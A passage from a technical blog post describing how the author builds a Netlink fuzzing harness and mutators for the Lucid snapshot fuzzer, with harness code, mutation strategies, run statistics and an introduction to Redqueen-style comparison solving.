<p>So the entire input is described by <code class="language-plaintext highlighter-rouge">struct lf_input</code>, which tells us the total length of the input (header included, since the harness compares it against the full fuzzcase length) and the number of messages, followed by all of the messages stuffed together. An individual message is described by <code class="language-plaintext highlighter-rouge">struct lf_msg</code>, which contains a <code class="language-plaintext highlighter-rouge">protocol</code> member corresponding to one of the Netlink protocols we listed earlier (<code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code>, <code class="language-plaintext highlighter-rouge">NETLINK_XFRM</code>, <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>, and <code class="language-plaintext highlighter-rouge">NETLINK_CRYPTO</code>), then the message’s length <code class="language-plaintext highlighter-rouge">msg_len</code>, and the message’s data thereafter:</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>============================= LUCID INPUT STRUCTURE =============================
lf_input {
  total_len: 4 bytes
  num_msgs:  4 bytes
  ────────────────────
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  ... (up to 16 messages)
}
=================================================================================
</code></pre></div></div>
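
<p>To make the layout concrete, here is a small sketch of how a test program or mutator could serialize an input in this format. The helper <code class="language-plaintext highlighter-rouge">lf_append_msg</code> is hypothetical, and the constant values are assumptions: the names match the harness, but the 8-byte header sizes are inferred from the two <code class="language-plaintext highlighter-rouge">u32</code> fields in each struct, and fields are written in host byte order because the harness simply casts the buffer.</p>

```c
#include <stdint.h>
#include <string.h>

#define LF_MAX_MSGS 16      // from the post: at most 16 messages per input
#define LF_INPUT_HDR_SIZE 8 // assumed: total_len + num_msgs
#define LF_MSG_HDR_SIZE 8   // assumed: protocol + msg_len

// Append one message to the serialized input in `buf` (capacity `cap`).
// Start from a zeroed buffer. Returns the new total_len, or 0 on failure.
uint32_t lf_append_msg(uint8_t *buf, uint32_t cap, uint32_t protocol,
		       const void *data, uint32_t len) {
	uint32_t total, num;

	if (cap < LF_INPUT_HDR_SIZE)
		return 0;

	// Read the current lf_input header
	memcpy(&total, buf, 4);
	memcpy(&num, buf + 4, 4);
	if (total == 0)
		total = LF_INPUT_HDR_SIZE; // empty input: header only

	// Refuse to exceed the message count or the buffer capacity
	if (num >= LF_MAX_MSGS || total > cap ||
	    (uint64_t)total + LF_MSG_HDR_SIZE + len > cap)
		return 0;

	// Write the lf_msg header followed by the message bytes
	memcpy(buf + total, &protocol, 4);
	memcpy(buf + total + 4, &len, 4);
	memcpy(buf + total + LF_MSG_HDR_SIZE, data, len);

	// Update the lf_input header to account for the new message
	total += LF_MSG_HDR_SIZE + len;
	num++;
	memcpy(buf, &total, 4);
	memcpy(buf + 4, &num, 4);

	return total;
}
```

<p>Appending a 4-byte message to an empty buffer yields a <code class="language-plaintext highlighter-rouge">total_len</code> of 20: 8 bytes of input header, 8 bytes of message header, and 4 bytes of data.</p>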

<p>For testing and development purposes, I leveraged the flexibility/power of snapshot fuzzing to just add a new syscall to the Linux kernel that looked like:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">lucid_fuzz</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside lucid fuzz!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="c1">// Initialize everything we need to fuzz</span>
	<span class="n">ret</span> <span class="o">=</span> <span class="n">lf_init</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Initialization done</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="c1">// Handle fuzz inputs</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">lf_handle_input</span><span class="p">())</span> <span class="p">{</span>
		<span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Cleanup resources, not needed when fuzzing, but good for testing</span>
	<span class="n">lf_cleanup</span><span class="p">();</span>

<span class="nl">done:</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside done, returning %d!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">ret</span><span class="p">);</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So this will take a user-supplied data buffer and send it to <code class="language-plaintext highlighter-rouge">lf_init</code>, which is a function I wrote that pre-allocates the socket buffers we want to use (remember, we know that at most we can send 16 messages) and finds all of the Netlink subsystem receive handlers, functions like <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code>, <code class="language-plaintext highlighter-rouge">rtnetlink_rcv</code>, <code class="language-plaintext highlighter-rouge">crypto_netlink_rcv</code>, and <code class="language-plaintext highlighter-rouge">xfrm_netlink_rcv</code>. When not fuzzing under Lucid, the syscall will copy the user-supplied data into the global “fuzzcase” variable and then <code class="language-plaintext highlighter-rouge">lf_handle_input</code> will take care of wrapping that fuzzcase into the appropriate pre-allocated socket buffer and sending it to the appropriate handler. Here is what <code class="language-plaintext highlighter-rouge">lf_handle_input</code> looks like; this is where the magic happens. Keep in mind that the <code class="language-plaintext highlighter-rouge">fc</code> variable is a global, standing for “fuzzcase”, and this is where Lucid injects fuzzing inputs:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Main fuzzcase handling logic</span>
<span class="kt">int</span> <span class="nf">lf_handle_input</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_msg</span> <span class="o">*</span><span class="n">msg</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">remaining</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">fuzz_skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Inside lf_handle_input</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/** LUCID TAKES SNAPSHOT HERE **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

	<span class="c1">// Make sure we have enough size to make an `lf_input` struct</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span><span class="p">))</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Get the `lf_input` and do sanity checks</span>
	<span class="n">curr</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="p">)</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">curr</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">!=</span> <span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">||</span> <span class="n">curr</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_INPUT_SIZE</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">curr</span><span class="o">-&gt;</span><span class="n">num_msgs</span> <span class="o">&gt;</span> <span class="n">LF_MAX_MSGS</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Remaining bytes to consume</span>
	<span class="n">remaining</span> <span class="o">=</span> <span class="n">curr</span><span class="o">-&gt;</span><span class="n">total_len</span><span class="p">;</span>

	<span class="c1">// Since we created a structure, we have consumed the `lf_input` header, we</span>
	<span class="c1">// can count those bytes as consumed and update remaining</span>
	<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Update offset to point to the first message</span>
	<span class="n">offset</span> <span class="o">=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Parse and handle the messages in the input</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">curr</span><span class="o">-&gt;</span><span class="n">num_msgs</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// Make sure we have enough size to make an `lf_msg` struct</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">LF_MSG_HDR_SIZE</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Create an `lf_msg` struct</span>
		<span class="n">msg</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_msg</span> <span class="o">*</span><span class="p">)(</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_MSG_SIZE</span> <span class="o">||</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">protocol</span> <span class="o">&gt;=</span> <span class="n">LF_NUM_PROTOCOLS</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We've now consumed the message header bytes</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_MSG_HDR_SIZE</span><span class="p">;</span>

		<span class="c1">// Make sure we have enough data remaining to fill this message</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Create a fuzzcase skb to send to netlink_rcv function</span>
		<span class="n">fuzz_skb</span> <span class="o">=</span> <span class="n">create_fuzz_skb</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fuzz_skb</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
		
		<span class="c1">// Dispatch the skb to the appropriate handler</span>
		<span class="n">dispatch_skb</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">fuzz_skb</span><span class="p">);</span>

		<span class="c1">// Update offset</span>
		<span class="n">offset</span> <span class="o">+=</span> <span class="p">(</span><span class="n">LF_MSG_HDR_SIZE</span> <span class="o">+</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span><span class="p">);</span>

		<span class="c1">// Update remaining</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">msg</span><span class="o">-&gt;</span><span class="n">msg_len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Check to see if we have remaining, if we do, something is amiss</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="cm">/** LUCID RESTORES SNAPSHOT HERE **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

	<span class="c1">// Success</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We iterate through the array of messages, parse them, and send them on their way to the appropriate subsystem. I also made this harness extremely strict so that we fail if anything is amiss, even if we merely have leftover bytes after parsing. Any failure causes <code class="language-plaintext highlighter-rouge">lf_input</code> to return early and never reach the snapshot restoration NOP instruction. The fuzzcase then “escapes” the fuzzing harness and eventually incurs a timeout. In Lucid, timeouts are based on the number of emulated instructions, so it would be immediately obvious if we had a mutator/generator/harness bug because the fuzzcases would time out.</p>

<p>During this portion of development, I was really focused on optimizing the harness. I wanted to skip all of the Netlink sanity checking and plumbing that takes place after the initial <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code> function, thinking this would speed up the fuzzer substantially. I was really careful to retain semantic equivalence to that skipped code. However, in the end, I made mistakes that you may be able to spot. For instance, during a normal <code class="language-plaintext highlighter-rouge">netlink_sendmsg</code> call, the socket buffer that it creates doesn’t have all of the same fields initialized and it doesn’t use kernel sockets. So I actually had a single false positive <code class="language-plaintext highlighter-rouge">NULL</code> pointer dereference crash at one point during my longest fuzzing session that wouldn’t have existed if I had retained 100% semantic equivalence. Going forward on the blog, I think I’ll move towards less invasive harnessing and just eat the performance hit. Once our fuzzcases started reaching deeper code paths, it became apparent that the fuzzer was extremely slow regardless and that the aggressive harness optimization wouldn’t have made much of a difference, so I’m going to skip it going forward.</p>

<p>It should be noted that this is not a great approach for <em>finding bugs</em>. We’re merely trying to assess how Lucid does fuzzing some real code. Sending random messages per input to the various subsystems that have little interplay with one another and can’t access each other in any meaningful way is not a strategy for reaching deep code and finding complex bugs. Fuzzing in this way is more likely to reveal simple shallow parsing level bugs, and in 2025 that is probably not going to yield many results.</p>

<h2 id="stage-1-fuzzing-dumb-byte-mutator">Stage 1 Fuzzing: Dumb Byte Mutator</h2>
<p>First things first, let’s throw some random bytes at these Netlink handlers. To do this, I changed how Lucid sees mutator code. Now, there is a top-level <code class="language-plaintext highlighter-rouge">Mutators</code> crate that defines several generic traits and characteristics that every custom mutator implementation must have. These are things like a <code class="language-plaintext highlighter-rouge">rand</code> function, for example. Once you implement the generic pieces that the core fuzzer relies on, you are free to make the mutator as custom as you like and put it under <code class="language-plaintext highlighter-rouge">mutators/</code> in the source code directory. This allows some pretty nice flexibility. I added a command line flag to specify a mutator by name, and the mutator is then created by this factory-style function in <code class="language-plaintext highlighter-rouge">mod.rs</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cd">/// Simple factory to create mutators by name (extend as needed).</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">create_mutator</span><span class="p">(</span>
    <span class="n">name</span><span class="p">:</span> <span class="o">&amp;</span><span class="nb">str</span><span class="p">,</span>
    <span class="n">seed</span><span class="p">:</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="nb">usize</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">max_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">Box</span><span class="o">&lt;</span><span class="k">dyn</span> <span class="n">Mutator</span><span class="o">&gt;</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">match</span> <span class="n">name</span> <span class="p">{</span>
        <span class="s">"toy"</span> <span class="k">=&gt;</span> <span class="nf">Ok</span><span class="p">(</span><span class="nn">Box</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">ToyMutator</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">max_size</span><span class="p">))),</span>
        <span class="s">"netlink"</span> <span class="k">=&gt;</span> <span class="nf">Ok</span><span class="p">(</span><span class="nn">Box</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="nn">NetlinkMutator</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">max_size</span><span class="p">))),</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="o">&amp;</span><span class="nd">format!</span><span class="p">(</span><span class="s">"Unrecognized mutator '{}'"</span><span class="p">,</span> <span class="n">name</span><span class="p">))),</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>I started off by just implementing some basic mutation strategies:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">ByteInsert</code>: Randomly insert bytes of arbitrary value into the message buffer</li>
  <li><code class="language-plaintext highlighter-rouge">ByteOverwrite</code>: Randomly overwrite a byte in the message with a byte of arbitrary value</li>
  <li><code class="language-plaintext highlighter-rouge">ByteDelete</code>: Randomly delete a byte from the message buffer</li>
  <li><code class="language-plaintext highlighter-rouge">BitFlip</code>: Randomly flip a bit in the message buffer</li>
  <li><code class="language-plaintext highlighter-rouge">ProtocolChange</code>: Randomly change the protocol of a message (ie, switch from <code class="language-plaintext highlighter-rouge">NETLINK_ROUTE</code> to <code class="language-plaintext highlighter-rouge">NETLINK_NETFILTER</code>)</li>
</ul>

<p>In addition to these strategies, the mutator will often “stack” these strategies per input. I defined a <code class="language-plaintext highlighter-rouge">MAX_STACK</code> of 7 (arbitrary), and so the mutator may choose to randomly mutate the input with up to 7 of these strategies per iteration.</p>
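<p>To make the stacking idea concrete, here is a minimal sketch of how the four byte-level strategies could be stacked. This is not Lucid’s actual mutator code: the <code class="language-plaintext highlighter-rouge">Rng</code> type, the <code class="language-plaintext highlighter-rouge">mutate</code> function, and their signatures are hypothetical, and <code class="language-plaintext highlighter-rouge">ProtocolChange</code> is left out because it depends on the harness message header.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Illustrative sketch only; this is not Lucid's actual mutator code.

/// Tiny xorshift64 PRNG so the example needs no external crates.
pub struct Rng(u64);

impl Rng {
    pub fn new(seed: u64) -&gt; Self {
        // xorshift state must never be zero
        Rng(if seed == 0 { 0x9E37_79B9_7F4A_7C15 } else { seed })
    }

    pub fn next_u64(&amp;mut self) -&gt; u64 {
        let mut x = self.0;
        x ^= x &lt;&lt; 13;
        x ^= x &gt;&gt; 7;
        x ^= x &lt;&lt; 17;
        self.0 = x;
        x
    }

    /// Pseudo-random index in 0..n (n must be non-zero).
    pub fn below(&amp;mut self, n: usize) -&gt; usize {
        (self.next_u64() % n as u64) as usize
    }
}

/// Upper bound on stacked mutations per iteration (7 in the post).
pub const MAX_STACK: usize = 7;

/// Apply between 1 and MAX_STACK randomly chosen byte-level mutations.
pub fn mutate(buf: &amp;mut Vec&lt;u8&gt;, rng: &amp;mut Rng, max_size: usize) {
    let rounds = 1 + rng.below(MAX_STACK);
    for _ in 0..rounds {
        match rng.below(4) {
            // ByteInsert: insert a random byte at a random position
            0 if buf.len() &lt; max_size =&gt; {
                let idx = rng.below(buf.len() + 1);
                let val = rng.next_u64() as u8;
                buf.insert(idx, val);
            }
            // ByteOverwrite: replace one byte with a random value
            1 if !buf.is_empty() =&gt; {
                let idx = rng.below(buf.len());
                buf[idx] = rng.next_u64() as u8;
            }
            // ByteDelete: remove one byte, never emptying the buffer
            2 if buf.len() &gt; 1 =&gt; {
                let idx = rng.below(buf.len());
                buf.remove(idx);
            }
            // BitFlip: flip a single random bit
            3 if !buf.is_empty() =&gt; {
                let idx = rng.below(buf.len());
                buf[idx] ^= 1 &lt;&lt; rng.below(8);
            }
            // Strategy not applicable to this buffer; skip the round
            _ =&gt; {}
        }
    }
}
</code></pre></div></div>
<p>Calling <code class="language-plaintext highlighter-rouge">mutate(&amp;mut buf, &amp;mut rng, max_size)</code> once per iteration is enough; the guards keep the buffer between 1 and <code class="language-plaintext highlighter-rouge">max_size</code> bytes as long as it starts in that range.</p>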

<p>These mutation strategies actually achieved quite a bit of code coverage surprisingly. Initially, the iterations were extremely short because most Netlink messages we sent were nonsensical. The Netlink message structure looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * struct nlmsghdr - fixed format metadata header of Netlink messages
 * @nlmsg_len:   Length of message including header
 * @nlmsg_type:  Message content type
 * @nlmsg_flags: Additional flags
 * @nlmsg_seq:   Sequence number
 * @nlmsg_pid:   Sending process port ID
 */</span>
<span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="p">{</span>
	<span class="n">__u32</span>		<span class="n">nlmsg_len</span><span class="p">;</span>
	<span class="n">__u16</span>		<span class="n">nlmsg_type</span><span class="p">;</span>
	<span class="n">__u16</span>		<span class="n">nlmsg_flags</span><span class="p">;</span>
	<span class="n">__u32</span>		<span class="n">nlmsg_seq</span><span class="p">;</span>
	<span class="n">__u32</span>		<span class="n">nlmsg_pid</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>

<p>Since we’re sending random bytes, we rarely have a <code class="language-plaintext highlighter-rouge">nlmsg_len</code> that makes sense for our random array of message bytes. So it took a while for the fuzzer to generate an input with the right length, pass that early sanity check in message parsing, and actually reach the code behind it.</p>

<p>Here are the results I achieved with this simple mutator and our aforementioned harness in a short time:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-19 08:57:11)]
globals: uptime: 0d 22h 26m 28s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 88.266M | iters/s: 206.81 | iters/s/f: 25.85
cpu: target: 92.7% | reset: 6.8% | mutator: 0.0% | coverage: 0.5% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16917 | last find: 0h 2m 6s | map: 25.81%
snapshot: dirty pages: 3841 | dirty / total: 0.00068% | reset memcpys: 438
corpus: inputs: 31000 | corpus size (MB): 318.303 | max input: 0x8088
</code></pre></div></div>

<p>You can see that we fuzzed the harness with this iteration of the mutator for almost a full day on my development VM. Surprisingly, it captured quite a few edges, around 17k. It also processed a lot of iterations, roughly 88 million during that time period. Globally, across all 8 fuzzers, we were sitting at about 200 iterations/sec when the last stats banner printed. Relative to subsequent versions of the mutator, this is a lot of throughput. As we discussed, that is because most inputs simply didn’t pass initial parsing and returned early; in other words, our mutator created a ton of junk that didn’t do anything worthwhile. So while the throughput looks good on paper, it’s actually not good for us. We can also tell this from the relatively high share of CPU time spent in <code class="language-plaintext highlighter-rouge">reset</code>: almost 7% of our time goes to performing snapshot resets.</p>

<p>Before we get much further comparing results across different iterations of the fuzzer, it should be noted that these results are likely not very meaningful. We can possibly draw big-picture conclusions like: it’s better to send inputs that have a sane <code class="language-plaintext highlighter-rouge">nlmsg_len</code>, but the results are likely too random to glean much else when we aren’t making 10x improvements. So keep in mind that we aren’t doing a proper experiment here. I make a change to the fuzzer, run it for a day or so, check results, compare, repeat. With how low our throughput is (Lucid is very slow), and how limited our fuzzing time is, we can’t produce high-quality statistics.</p>

<p>It should also be noted that when I tweeted about fuzzing with Lucid using this mutator, I mentioned that the fuzzer did find an edge case OOB read bug, but it was artificial in that upstream sanity checks that our harness skips would prevent it from happening. So I’m not counting it as Lucid’s first 0day.</p>

<h2 id="stage-2-fuzzing-more-mutation-strategies">Stage 2 Fuzzing: More Mutation Strategies</h2>
<p>The next step is to flesh out the mutator a little more. I added several new mutation methods that would enable us to increase our efficiency (not send so much garbage) and also create inputs that would previously have been nearly impossible to generate.</p>

<p>I added the following mutation strategies:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">UniProtocol</code>: Make every message in the input target the same protocol</li>
  <li><code class="language-plaintext highlighter-rouge">DuplicateMessage</code>: Duplicate one of the messages in the input</li>
  <li><code class="language-plaintext highlighter-rouge">ShuffleMessages</code>: Randomly shuffle the order of the messages in the input</li>
  <li><code class="language-plaintext highlighter-rouge">SpliceMessage</code>: Steal a message from another input and splice it into the current input</li>
  <li><code class="language-plaintext highlighter-rouge">PatchHeaderLen</code>: Determine what the correct <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_len</code> value should be and patch it</li>
  <li><code class="language-plaintext highlighter-rouge">PatchHeaderType</code>: Somewhat intelligently, put message type values in place of <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_type</code> for the subsystems we’re targeting</li>
  <li><code class="language-plaintext highlighter-rouge">PatchHeaderFlags</code>: Randomly create somewhat logically sane <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_flags</code> values</li>
</ul>

<p>This step helped us quite a bit; it basically improved our efficiency by 2x:</p>
<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[lucid stats (start time: 2025-09-20 16:24:38)]
globals: uptime: 0d 14h 8m 35s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 2.821M | iters/s: 31.18 | iters/s/f: 3.90
cpu: target: 97.4% | reset: 2.4% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 17740 | last find: 1h 4m 52s | map: 27.07%
snapshot: dirty pages: 7455 | dirty / total: 0.00132% | reset memcpys: 648
corpus: inputs: 313510 | corpus size (MB): 3779.988 | max input: 0x8088
</code></pre></div></div>

<p>As you can see, we were able to capture more edges in about two-thirds of the wall-clock time (roughly 14 hours versus 22). In terms of iterations, we captured more edges with roughly 30x fewer iterations (2.8 million versus 88 million). So this is a pretty massive efficiency boost. I think most of this comes from having sane <code class="language-plaintext highlighter-rouge">nlmsghdr-&gt;nlmsg_len</code> values being saved to the corpus as well as the mutation strategies that allow us to create more complex inputs.</p>
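<p>As a rough illustration of the <code class="language-plaintext highlighter-rouge">PatchHeaderLen</code> idea, the sketch below rewrites the first four bytes of a message buffer with the buffer’s real length. It assumes each buffer holds exactly one Netlink message and that the target is little-endian x86; the function name and signature are hypothetical, not Lucid’s actual code.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Illustrative sketch only; assumes one Netlink message per buffer.

/// Size of `struct nlmsghdr`: u32 + u16 + u16 + u32 + u32.
pub const NLMSG_HDRLEN: usize = 16;

/// Overwrite `nlmsg_len` (the first 4 bytes, little-endian on x86) with the
/// actual buffer length. Returns false if the buffer cannot hold a header
/// or its length does not fit in a u32.
pub fn patch_header_len(msg: &amp;mut [u8]) -&gt; bool {
    if msg.len() &lt; NLMSG_HDRLEN || msg.len() &gt; u32::MAX as usize {
        return false;
    }
    let len = msg.len() as u32;
    msg[..4].copy_from_slice(&amp;len.to_le_bytes());
    true
}
</code></pre></div></div>
<p>Running something like this after the dumb byte mutations means a message no longer needs to get lucky on its length field to make it past early parsing.</p>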

<p>Previously if we were able to randomly generate a message that achieved quite a bit of code coverage, we were kind of limited in that we would have had to get extremely lucky to have another message in the same input randomly become similarly successful via dumb byte flipping. Instead now, we have new strategies like message duplication, message splicing, and unifying protocols so that each message has a chance to be sent to the same subsystem etc, and we can achieve deeper code coverage because our messages can now build off of previous messages in the same input.</p>

<p>Because our inputs now had a dramatically higher chance of passing initial parser checks, our throughput plummeted to around 2-4 iterations/sec/fuzzer. I have to admit this was shockingly lower than I expected. I know Bochs emulation is a considerable slowdown from native execution, somewhere around 100x I believe, but I hadn’t really seen it yet because up to this point we had only fuzzed toy targets for fuzzer development. This is why people say not to optimize too early: we had no idea that our Bochs emulation bottleneck was so pronounced, and we could’ve spent a lot of time micro-optimizing core fuzzer code without it making any difference at all.</p>

<h2 id="stage-3-adding-compare-coverage-with-redqueen">Stage 3: Adding Compare Coverage with Redqueen</h2>
<p>To this point, we hadn’t been using Lucid’s built-in Redqueen tooling. For those who are unaware, <a href="https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_04A-2_Aschermann_paper.pdf">Redqueen</a> is the name of a fuzzing paper by the geniuses at Ruhr University Bochum that tackles the problem of solving comparisons in fuzzing.</p>

<p>Oftentimes in fuzzing, the target will want to compare values derived from your input to values that it knows should/could exist. For instance, the following may exist semantically in a fuzzing target:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)(</span><span class="o">&amp;</span><span class="n">fuzzing_input</span><span class="p">[</span><span class="mh">0x1337</span><span class="p">])</span> <span class="o">==</span> <span class="mh">0xdeadbeef</span><span class="p">)</span> <span class="p">{</span>
  <span class="n">buggy_function</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<p>In this example, the target is checking our input for the presence of a magic value, in this case <code class="language-plaintext highlighter-rouge">0xdeadbeef</code>. A lot of the time, these simple magic byte value checks represent a huge roadblock in automated fuzzing with no human in the loop. Using our dumb byte flipping mutations, we would have to target all 4 consecutive bytes and also randomly set each of them to the right value. This can be basically impossible in a lot of circumstances.</p>

